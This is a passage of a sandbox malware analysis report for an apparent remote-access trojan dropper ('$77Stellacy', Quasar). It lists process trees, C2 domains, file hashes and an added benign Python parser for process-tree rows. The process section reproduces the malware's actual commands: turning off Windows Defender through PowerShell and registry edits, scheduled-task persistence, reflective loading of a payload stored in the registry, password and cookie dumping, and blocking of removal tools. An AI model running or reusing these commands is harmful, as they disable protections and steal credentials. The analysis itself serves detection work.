PID 2936 wrote to memory of 2860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2808 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2808 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2808 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2696 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2696 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2696 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2692 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2692 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2692 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2712 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2712 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2712 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2256 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2936 wrote to memory of 2256 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2936 wrote to memory of 2256 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2936 wrote to memory of 948 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
PID 2936 wrote to memory of 948 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
PID 2936 wrote to memory of 948 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
PID 2936 wrote to memory of 576 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe
PID 2936 wrote to memory of 576 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe
PID 2936 wrote to memory of 576 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe
PID 2936 wrote to memory of 576 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe
PID 2936 wrote to memory of 1772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2936 wrote to memory of 1772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2936 wrote to memory of 1772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2936 wrote to memory of 1948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2936 wrote to memory of 1948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2936 wrote to memory of 1948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2936 wrote to memory of 2676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2936 wrote to memory of 2676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2936 wrote to memory of 2676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
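
Three of the tables in this analysis describe process relationships in the same "PID A <verb> B N/A <process> <target>" shape: the NtCreateUserProcessOtherParentProcess rows (powershell.EXE creating a child that names winlogon.exe, PID 432, as its parent, which is parent-PID spoofing), the SetThreadContext rows (powershell.EXE redirecting a thread in a dllhost.exe it owns, the pattern seen in process hollowing) and the WriteProcessMemory rows above. The script below is an added example, not part of the report or the sandbox; it parses all three row types, collapses the repeated WriteProcessMemory rows into one edge per parent and child (the repeats are repeated writes into the same new child while it is being set up, not additional children), renders the resulting process tree, and lists the spoofed-parent and thread-context events separately. It assumes image paths contain no spaces, which is true of every row in this report; the sample rows are copied from the tables with their repeat counts preserved.

```python
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class PidEvent:
    src: int
    verb: str        # "wrote to memory of" | "created" | "set thread context of"
    dst: int
    src_image: str
    dst_image: str


_RE_EVENT = re.compile(
    r"^PID (?P<src>\d+) (?P<verb>wrote to memory of|created|set thread context of) "
    r"(?P<dst>\d+)\s+N/A\s+(?P<simg>\S+)\s+(?P<dimg>\S+)$")

# Constructed sample input: rows copied from the three tables named above.
_ROOT = r"PID 1760 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe C:\Users\$77main1.exe"
_CMD = r"PID 2880 wrote to memory of 2936 N/A C:\Users\$77main1.exe C:\Windows\system32\cmd.exe"
SAMPLE_PID_ROWS = (
    [r"PID 1608 created 432 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe",
     r"PID 1608 set thread context of 1740 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe"]
    + [_ROOT] * 4
    + [_CMD] * 4
    + [r"PID 2936 wrote to memory of 2980 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"] * 3
    + [r"PID 2936 wrote to memory of 1960 N/A C:\Windows\system32\cmd.exe C:\Users\$77Redownloader.exe"] * 4
    + [r"PID 2936 wrote to memory of 2860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe"] * 3
    + [r"PID 2936 wrote to memory of 948 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe"] * 3
    + [r"PID 2936 wrote to memory of 1772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe"] * 3
)


def parse_events(lines) -> list[PidEvent]:
    events = []
    for line in lines:
        m = _RE_EVENT.match(line.strip())
        if m:
            events.append(PidEvent(int(m["src"]), m["verb"], int(m["dst"]), m["simg"], m["dimg"]))
    return events


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def creation_edges(events):
    """(parent, child) -> row count, in first-seen order; repeats collapse to one edge."""
    edges: dict[tuple[int, int], int] = {}
    images: dict[int, str] = {}
    for e in events:
        if e.verb == "wrote to memory of":
            edges[(e.src, e.dst)] = edges.get((e.src, e.dst), 0) + 1
            images.setdefault(e.src, e.src_image)
            images.setdefault(e.dst, e.dst_image)
    return edges, images


def render_tree(events) -> list[str]:
    """Indented 'pid image' lines, one per process, roots first."""
    edges, images = creation_edges(events)
    children: dict[int, list[int]] = {}
    for parent, child in edges:
        children.setdefault(parent, []).append(child)
    child_set = {child for _, child in edges}
    lines: list[str] = []

    def walk(pid: int, depth: int) -> None:
        lines.append("  " * depth + f"{pid} {basename(images[pid])}")
        for c in children.get(pid, []):
            walk(c, depth + 1)

    for root in [p for p in children if p not in child_set]:
        walk(root, 0)
    return lines


def spoofed_parents(events):
    """'created' rows: src is the real creator, dst (the Target column) is the parent handed
    to the new process, so the child will report dst, not src, as its parent."""
    return [(e.src, basename(e.src_image), e.dst, basename(e.dst_image))
            for e in events if e.verb == "created" and e.src != e.dst]


def thread_context_writes(events):
    return [(e.src, basename(e.src_image), e.dst, basename(e.dst_image))
            for e in events if e.verb == "set thread context of"]


if __name__ == "__main__":
    evs = parse_events(SAMPLE_PID_ROWS)
    print("\n".join(render_tree(evs)))
    for src, simg, dst, dimg in spoofed_parents(evs):
        print(f"PPID spoof: {simg} ({src}) created a child that reports {dimg} ({dst}) as parent")
    for src, simg, dst, dimg in thread_context_writes(evs):
        print(f"SetThreadContext: {simg} ({src}) -> {dimg} ({dst})")
```

The tree the sample rows produce is the original dropper, then $77main1.exe, then cmd.exe (running the .bat from the Processes section), with powershell, $77Redownloader.exe, reg.exe, $77Stellacy.exe and schtasks.exe as cmd.exe's children. Note that the spoofed-parent child and the dllhost.exe targets do not appear in this tree at all: a tree built only from parent-child records will hang those processes under winlogon.exe, which is exactly what the spoofing is for.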

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\services.exe

C:\Windows\system32\services.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsm.exe

C:\Windows\system32\lsm.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k RPCSS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork

C:\Windows\system32\taskhost.exe

"taskhost.exe"

C:\Windows\system32\Dwm.exe

"C:\Windows\system32\Dwm.exe"

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE

"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation

C:\Windows\system32\sppsvc.exe

C:\Windows\system32\sppsvc.exe

C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe"

C:\Users\$77main1.exe

"C:\Users\$77main1.exe" 0

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B635.tmp\B636.tmp\B637.bat C:\Users\$77main1.exe 0"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1751213302-1385746122110234050-934115374-8464557901720287217-1526424837-1330299757"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-MpPreference -ExclusionPath 'C:\' -Force

C:\Users\$77Redownloader.exe

"C:\Users\$77Redownloader.exe" -o"C:\Users\Admin\AppData\Local\Microsoft\Windows" -y

C:\Windows\system32\reg.exe

Reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatIdDefaultAction" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatIdDefaultAction" /v "2147772079" /t REG_SZ /d "6" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatIdDefaultAction" /v "2147735505" /t REG_SZ /d "6" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatIdDefaultAction" /v "2147745502" /t REG_SZ /d "6" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t "REG_DWORD" /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "5" /t "REG_SZ" /d "6" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "1" /t "REG_SZ" /d "6" /f

C:\Windows\system32\timeout.exe

timeout 10

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe

"C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe"

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe

"C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /RU Admin /create /tn "$77Stellacy.job" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe" /sc minute /mo 1 /RL HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /RU Admin /create /tn "$77SX.job" /tr "'C:\Windows\System32\Wscript.exe'C:\Users\Admin\AppData\Local\Microsoft\Windows\$77vbs.vbs" /sc minute /mo 40 /RL HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks /RU Admin /create /tn "$77STLR.job" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe" /sc onstart /RL HIGHEST /f

C:\Windows\system32\timeout.exe

timeout 10

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "$77Quasar.job" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe

"C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs4cciCKuj10fS4tEFtsNPmrL/0jPo2AcIdfc9jK0U15Lp5iXQGku3ZLiCUn4WwDSh+A0ftN5CXUAmVy5X4PPHFWMzuIK7S46Iv9KhQeGUN+idJw7zi086Au7DP0yct2lQY=

C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe

"C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe"

C:\Windows\system32\timeout.exe

timeout 20

C:\Windows\system32\taskeng.exe

taskeng.exe {3BA54D79-45F1-4612-983D-2FA617B33DF7} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-12656054402070301516-4255555401522191709-4118009271430661657693471369-971391952"

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{b640a9e3-a768-4522-b411-f3fd820d4a48}

C:\Windows\system32\taskeng.exe

taskeng.exe {A9057942-B5C4-4631-B462-62F08246B1CD} S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{f56410db-7eb5-4b3e-a77b-673cdf693e07}

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c compile.bat

C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe

C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c compile.bat

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1957198345-102239573611340640-1273495592588059072-68869171511852531341649145162"

C:\Users\Admin\AppData\Local\Temp\winhlp32.exe

C:\Users\Admin\AppData\Local\Temp\winhlp32.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies1"

C:\Users\Admin\AppData\Local\Temp\splwow64.exe

C:\Users\Admin\AppData\Local\Temp\splwow64.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies2"

C:\Users\Admin\AppData\Local\Temp\hh.exe

C:\Users\Admin\AppData\Local\Temp\hh.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies3"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c compile.bat

C:\Users\Admin\AppData\Local\Temp\xwizard.exe

C:\Users\Admin\AppData\Local\Temp\xwizard.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_History.txt"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-2007663707-1750485760-95921033511188272091101812646368208037425860902750494678"

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Windows\system32\ReAgentc.exe

reagentc.exe /disable

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\reagentc.exe"

C:\Windows\system32\icacls.exe

icacls "C:\Windows\System32\reagentc.exe" /grant *S-1-5-32-544:F /T /C /Q

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\reagent.dll"

C:\Windows\system32\icacls.exe

icacls "C:\Windows\System32\reagent.dll" /grant *S-1-5-32-544:F /T /C /Q

C:\Windows\system32\taskkill.exe

taskkill /im "SecurityHealthSystray.exe" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "MRT" /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "1" /t REG_SZ /d "MRT.exe" /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "2" /t REG_SZ /d "rkill.exe" /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "3" /t REG_SZ /d "rkill32.exe" /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "4" /t REG_SZ /d "rkill64.exe" /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "5" /t REG_SZ /d "MBSetup.exe" /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "6" /t REG_SZ /d "mbam.exe" /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "7" /t REG_SZ /d "mbar.exe" /f

C:\Windows\system32\timeout.exe

timeout 2

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 stellacy.duckdns.org udp
US 87.249.134.21:55562 stellacy.duckdns.org tcp
US 8.8.8.8:53 itroublvehacker.gq udp
US 8.8.8.8:53 api64.ipify.org udp
US 104.237.62.213:443 api64.ipify.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 stellacy.ydns.eu udp
SE 193.138.218.173:55562 stellacy.ydns.eu tcp
US 8.8.8.8:53 stellacy.tk udp
IE 3.249.173.109:55562 stellacy.tk tcp
US 8.8.8.8:53 stellacy2.duckdns.org udp
SE 193.138.218.173:55562 stellacy2.duckdns.org tcp
US 8.8.8.8:53 stellacy.duckdns.org udp
US 87.249.134.21:55562 stellacy.duckdns.org tcp
SE 193.138.218.173:55562 stellacy2.duckdns.org tcp

Files

\Users\$77main1.exe

MD5 40f541872b9b1f1da056ac6d4bc90ea4
SHA1 6e121d49311a8df04a70b6de6069460f2d55f609
SHA256 65453a408cdcd028c8e1b091abe9397d73e2cba9708b71feac6c9ccaa497ce90
SHA512 8456bd7ea4f898a96bd62b870f2aab466eaa4f0b0f446a108f16a9fb9ef84cd433ec9125931875138b281a9347f8ab9d99bc9d3dc54e89fb8e268f151d6dc74e

C:\Users\Admin\AppData\Local\Temp\B635.tmp\B636.tmp\B637.bat

MD5 ad9f604467f73ca7ddfef6f71dcf4798
SHA1 544808b2d40f5249b65c6e1e4abcd32f3af1a896
SHA256 7b8951b26d5ddf383a7ff37e5f2579be975d8702f7109dbc8f8393563a720ef0
SHA512 c59c1777bb07e82e35325274460adffd4b4ca216fbdc20c694ee92af772d9ce1a45ba18bd2c626083beef8e95bae82fb365414ca63100e6cc6262c2459a575f3

memory/2980-18-0x000000001B730000-0x000000001BA12000-memory.dmp

memory/2980-19-0x0000000002000000-0x0000000002008000-memory.dmp

C:\Users\$77Redownloader.exe

MD5 067d274dc271710cb8afd7c0680958fe
SHA1 4282104ec316c3452a81afc623c61ed348331436
SHA256 c53fbf5e1b8a3c6c3930073c359a07aa6fcccfb1a0275dab49ed6584c20aa051
SHA512 3c3a4c4678c735419d6e92570e5c9fd0cd5b34a46bb025b71c8925a27c64f9d3e5d20b16610e3085477c88b309dcbe4335aa3d6c3bac334ab461759f1320a29c

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe

MD5 b7062a62e271b7dd402b7406f8a611ad
SHA1 952cbd23fd41cbc40d17c988de946ec983d262de
SHA256 d93529443f83e24a4ca90e835ab5b46fc83337862e5ab08343722945a002279c
SHA512 2f7aec552d2bcc53a218e4353c29f71e0b0af4b0c4a51c59f4ad4116e5cf46bde4584d61d3738260fb48fa03a79ec0202ba750e6e8434f4b0d3e12560fa94867

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe

MD5 9d972046c0e663416177f42d19f38e35
SHA1 23aeec718eed2be8adf5380311fc787db03bfc43
SHA256 ad541a7a9372fb33689839ac297536ff01cab78c51df04c4334cf4ce2dd4e9a4
SHA512 25e9ba52944348c5ce54df6da8efc5025aa9b8c7e4fe25f56a386f285878c3d1ef27dd5fcc22e9c51dfe25a811a0484d314b21ecfdc352d2f4bdade4e68bf808

C:\Users\Admin\AppData\Local\Microsoft\Windows\Backup.bat

MD5 73336bee4fa2b1c3751fa012c9333a79
SHA1 2cc55d9440ed3c17e6b05466c10334b0d3ef0408
SHA256 435662c5b86525b076aa25aa55f06ab2f41bf34bb032544c466feac53ea378b2
SHA512 8eefbe6eb117387ab6a88a6a7d4aa919d935df22e4d60ebb3247462f9df3ea76ec4293dd2d57445a40a9c2c23188900a297e0543cec6e9ef54555617163852b8

memory/948-42-0x00000000008D0000-0x00000000008D8000-memory.dmp

memory/576-43-0x0000000000810000-0x0000000000B0E000-memory.dmp

memory/948-44-0x000000001AC40000-0x000000001ACDE000-memory.dmp

\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe

MD5 88ab0bb59b0b20816a833ba91c1606d3
SHA1 72c09b7789a4bac8fee41227d101daed8437edeb
SHA256 f4fb42c8312a6002a8783e2a1ab4571eb89e92cd192b1a21e8c4582205c37312
SHA512 05cff2ca00ba940d9371c469bce6ffb4795c845d77525b8a1d4919f708296e66c0a6f3143c5964f5e963955e4f527a70624651113e72dc977f5ef40fa0276857

memory/1100-54-0x0000000000330000-0x000000000060A000-memory.dmp

memory/1100-55-0x000000001B560000-0x000000001B8A2000-memory.dmp

memory/1100-56-0x0000000000140000-0x0000000000146000-memory.dmp

memory/1100-57-0x0000000002420000-0x00000000024D0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe

MD5 964c5fffcba7f353cf12d09675a46de6
SHA1 9462c1249ef86c39da01b7480f1b2ce4a2a1a7b9
SHA256 b54e5acf0ab77f4eadf2920814d9bb3396e678fc5805fb296f9f59c41a1c52ed
SHA512 ab6dd5c11abc1abf164532f50a42584189ff1a812b255221a9705dfc47f57120e7d7f241bbb802114de79d165b002283b18a6c96b2e6e3ddc4b062757f0f8565

memory/1608-101-0x0000000000B10000-0x0000000000B18000-memory.dmp

memory/1608-100-0x0000000019F90000-0x000000001A272000-memory.dmp

memory/1608-102-0x0000000001480000-0x00000000014BE000-memory.dmp

memory/1608-104-0x0000000077490000-0x00000000775AF000-memory.dmp

memory/1608-103-0x00000000775B0000-0x0000000077759000-memory.dmp

memory/1740-108-0x0000000077490000-0x00000000775AF000-memory.dmp

memory/1740-107-0x00000000775B0000-0x0000000077759000-memory.dmp

memory/1740-106-0x0000000140000000-0x0000000140040000-memory.dmp

memory/1740-109-0x0000000140000000-0x0000000140040000-memory.dmp

C:\Windows\Tasks\$77svc64.job

MD5 ebbf450c8f19360b624f7fee691f89f3
SHA1 db96ff8eb3ddc3e9ffd2688e5ab99a64322dc5d2
SHA256 097ad0fe74c7e098469d0d659e568ae1f0d38af0314f46ae2d893168c74e3c46
SHA512 6458685b4d9c7b8daf53d5335d571503b52ef28b491598811f9694837fbc3bb7a8f54b6fdfed8ed405777cc85ca45615a14b71d6bf04ebbe13b79a6876ae15d2

C:\Windows\Tasks\$77svc32.job

MD5 2c4b9982208b13b81def776496577209
SHA1 4ae896fb968ab34c339d1ceebc30609acfebe239
SHA256 3337f7202d27823e7ba94154cc1d87e264770573a9a007931062684f9a1b5c9c
SHA512 dc2d7b058c0731292e110ddcc7e4771216aef2f70175ff58515e660ee6853cfc4c8accd35beccba2b4220d45ca75c9b37dc53849edcca5da390429eb6c4be680

memory/432-152-0x00000000375F0000-0x0000000037600000-memory.dmp

memory/488-162-0x00000000375F0000-0x0000000037600000-memory.dmp

memory/488-160-0x000007FEBDDA0000-0x000007FEBDDB0000-memory.dmp

memory/488-158-0x0000000000120000-0x000000000014A000-memory.dmp

memory/432-150-0x000007FEBDDA0000-0x000007FEBDDB0000-memory.dmp

